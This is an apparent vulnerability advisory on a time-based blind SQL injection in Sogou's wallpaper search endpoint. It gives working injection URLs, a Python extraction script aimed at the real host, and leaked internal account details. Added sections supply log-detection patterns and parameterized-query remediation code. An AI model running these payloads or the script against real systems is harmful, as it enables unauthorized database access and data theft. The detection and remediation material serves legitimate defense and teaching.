Sogou SQL injection (5): blind SQL injection vulnerability in wallpaper search
A MySQL time-based blind injection in the wallpaper search endpoint:
The following link takes about 4 seconds to respond, which shows that the width parameter is injectable:
http://so.bizhi.sogou.com/iosquery?dn=iPhone6,2&dr=640*1136&dv=8.0.2&h=aaaaaaa&height=1136&r=0000-0000&v=1.3.4.0005&width=aa%22%2b(select(0)from(select(sleep(4)))v)%2b%22&word=test
From the following link we can infer that the length of the current user() is 23:
http://so.bizhi.sogou.com/iosquery?dn=iPhone6,2&dr=640*1136&dv=8.0.2&h=aaaaaaa&height=1136&r=0000-0000&v=1.3.4.0005&width=aa%22%2b(select(0)from(select(sleep(if(length(user())=23,5,0))))v)%2b%22&word=test
When the delay reaches 5 seconds, the page displays:
"The page you are looking for is temporarily unavailable."
A few lines of Python guess each character by checking whether the response takes more than 5 seconds and whether that marker string appears in the page:
# Python 2 script: time-based blind extraction of user(), one character per request
import httplib
import time
import string
import sys
import random
import urllib

headers = {
    'Cookie': '',
    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}

# candidate characters: a-z, A-Z, 0-9, '@', '_' and '.'
payloads = list(string.ascii_lowercase)
payloads += list(string.ascii_uppercase)
for i in range(0, 10):
    payloads.append(str(i))
payloads += ['@', '_', '.']

print 'Current user() is:'
user = ''
for i in range(1, 24, 1):  # user() was found to be 23 characters long
    for payload in payloads:
        conn = httplib.HTTPConnection('so.bizhi.sogou.com', timeout=30)
        rand_num = str(random.random())
        url = '/iosquery?dn=iPhone6,2&dr=640*1136&dv=8.0.2&h=aaaaaaa&height=1136&r=0000-0000&v=1.3.4.0005&' + \
              'width=aa%22%2b(select(0)from(select(sleep(if(ascii(mid(user(),' + str(i) + \
              ',1))=' + str(ord(payload)) + ',5,0))))v)%2b%22&word=test'
        start_time = time.time()
        conn.request(method='GET', url=url, headers=headers)
        html_doc = conn.getresponse().read()
        conn.close()
        # a 5-second delay together with the error page means the guess was right
        if time.time() - start_time > 5 and \
           html_doc.find('The page you are looking for is temporarily unavailable.') > 0:
            user += payload
            sys.stdout.write(user + '\r')
            sys.stdout.flush()
            break
Guessing user() character by character yields:
Wallpaper@10.1.3.5
Guessing database() yields:
Wallpaper
Well, this figure shows that the script is random. Haha
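From the defender's side, every guess made by the script above is one request carrying a sleep() call in a parameter that should be numeric, and the response time jumps from tens of milliseconds to several seconds whenever a guess is right. The following Python 3 snippet is an added example, not code from the original advisory, that flags such requests in access-log lines. The log lines, IP addresses, timestamps and the log layout (request line, status, bytes, response time in seconds) are constructed here; the query strings reuse the page's own probes.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines imitating the probes described in the advisory.
# Layout (assumed): client_ip [timestamp] "request line" status bytes seconds
SAMPLE_LOG = """\
10.0.0.5 [19/Jan/2015:10:00:01] "GET /iosquery?dn=iPhone6,2&width=640&height=1136&word=test HTTP/1.1" 200 812 0.041
10.0.0.9 [19/Jan/2015:10:00:07] "GET /iosquery?dn=iPhone6,2&height=1136&width=aa%22%2b(select(0)from(select(sleep(4)))v)%2b%22&word=test HTTP/1.1" 200 812 4.102
10.0.0.9 [19/Jan/2015:10:00:15] "GET /iosquery?dn=iPhone6,2&height=1136&width=aa%22%2b(select(0)from(select(sleep(if(length(user())=23,5,0))))v)%2b%22&word=test HTTP/1.1" 503 233 5.310
10.0.0.9 [19/Jan/2015:10:00:23] "GET /iosquery?dn=iPhone6,2&height=1136&width=aa%22%2b(select(0)from(select(sleep(if(length(user())=22,5,0))))v)%2b%22&word=test HTTP/1.1" 200 812 0.052
10.0.0.7 [19/Jan/2015:10:00:30] "GET /iosquery?dn=iPhone6,2&width=750&height=1334&word=hello HTTP/1.1" 200 790 0.039
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) (?P<secs>[\d.]+)$')

# MySQL time-delay primitives used by time-based blind injection payloads.
DELAY_RE = re.compile(r'\b(?:sleep|benchmark)\s*\(', re.IGNORECASE)

# Parameters that must be plain integers on this endpoint (assumed from the
# advisory, where width/height are screen dimensions such as 640 and 1136).
INTEGER_PARAMS = ("width", "height")
SLOW_THRESHOLD = 3.0  # seconds; normal responses in the sample take ~40 ms


def analyse_line(line):
    """Return a record for one log line, with a list of reasons it looks suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # parse_qs percent-decodes the values, so %22%2b becomes "+ as the database saw it
    query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
    reasons = []
    for name in INTEGER_PARAMS:
        for value in query.get(name, []):
            if DELAY_RE.search(value):
                reasons.append("delay function in %s" % name)
            elif not value.isdigit():
                reasons.append("non-integer %s" % name)
    secs = float(m.group("secs"))
    if secs >= SLOW_THRESHOLD:
        reasons.append("slow response %.1fs" % secs)
    return {"ip": m.group("ip"), "status": m.group("status"),
            "seconds": secs, "reasons": reasons}


def suspicious_requests(log_text):
    """All records with at least one reason, in log order."""
    hits = []
    for line in log_text.splitlines():
        rec = analyse_line(line)
        if rec and rec["reasons"]:
            hits.append(rec)
    return hits


def probes_by_ip(hits):
    """Count delay-function probes per client; a run of them from one address is
    the signature of character-by-character extraction."""
    counts = {}
    for rec in hits:
        if any(r.startswith("delay function") for r in rec["reasons"]):
            counts[rec["ip"]] = counts.get(rec["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = suspicious_requests(SAMPLE_LOG)
    for rec in found:
        print(rec["ip"], rec["status"], "%.3fs" % rec["seconds"], ", ".join(rec["reasons"]))
    print("probes per client:", probes_by_ip(found))
```

The fourth line is the instructive one: the guess was wrong, so the response came back fast and only the payload itself gives it away, which is why the content check matters as much as the latency check. On the real endpoint the page's own error text ("temporarily unavailable") returned with a 5-second response time would be a second strong signal.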
Solution:
Parameter Filtering
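As an added illustration of that fix (not code from the original advisory or from Sogou), the following Python 3 snippet shows the two controls that close this class of hole: whitelist validation of width and height as plain integers, and a parameterized query instead of string concatenation. sqlite3 stands in for MySQL and the wallpaper table layout is assumed; build_query_unsafe only returns the concatenated SQL string, to show where the page's payload lands once the `%22` and `%2b` are decoded to `"` and `+`.

```python
import re
import sqlite3

# Constructed sample rows standing in for the real wallpaper table (schema assumed).
SAMPLE_ROWS = [
    ("wp-001", 640, 1136),
    ("wp-002", 640, 1136),
    ("wp-003", 750, 1334),
]

# A screen dimension is a positive integer of at most five digits, nothing else.
DIMENSION_RE = re.compile(r"[1-9][0-9]{0,4}")


def parse_dimension(value):
    """Whitelist-validate a width/height query parameter.

    Returns an int, or raises ValueError for anything that is not a plain
    positive integer.  The advisory's payload fails here before any SQL is built.
    """
    if not isinstance(value, str) or not DIMENSION_RE.fullmatch(value):
        raise ValueError("invalid dimension: %r" % (value,))
    return int(value)


def build_query_unsafe(width, height):
    """The pattern the advisory exploits: raw parameters pasted into SQL.

    Returned as a string for illustration only; it is never executed here.
    With MySQL's double-quoted strings, a value containing '"+(...)+"' turns
    the width comparison into arithmetic on an attacker-chosen subquery.
    """
    return ('select id from wallpaper where width="%s" and height="%s"'
            % (width, height))


def find_wallpapers(conn, width, height):
    """Hardened lookup: validate first, then bind values with placeholders."""
    w = parse_dimension(width)
    h = parse_dimension(height)
    cur = conn.execute(
        "select id from wallpaper where width = ? and height = ? order by id",
        (w, h))
    return [row[0] for row in cur.fetchall()]


def make_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table wallpaper (id text, width integer, height integer)")
    conn.executemany("insert into wallpaper values (?, ?, ?)", SAMPLE_ROWS)
    return conn


def demo():
    """Run a normal lookup and the advisory's payload through both code paths."""
    conn = make_demo_db()
    injected = 'aa"+(select(0)from(select(sleep(4)))v)+"'  # decoded page payload
    results = {"valid": find_wallpapers(conn, "640", "1136")}
    try:
        find_wallpapers(conn, injected, "1136")
        results["injected"] = "accepted"
    except ValueError:
        results["injected"] = "rejected"
    results["unsafe_sql"] = build_query_unsafe(injected, "1136")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

With a MySQL driver such as MySQLdb or PyMySQL the placeholder is `%s` rather than `?`, but the principle is the same: the value travels to the server as data, never as part of the statement text, and the integer check rejects the payload independently of how the query is built.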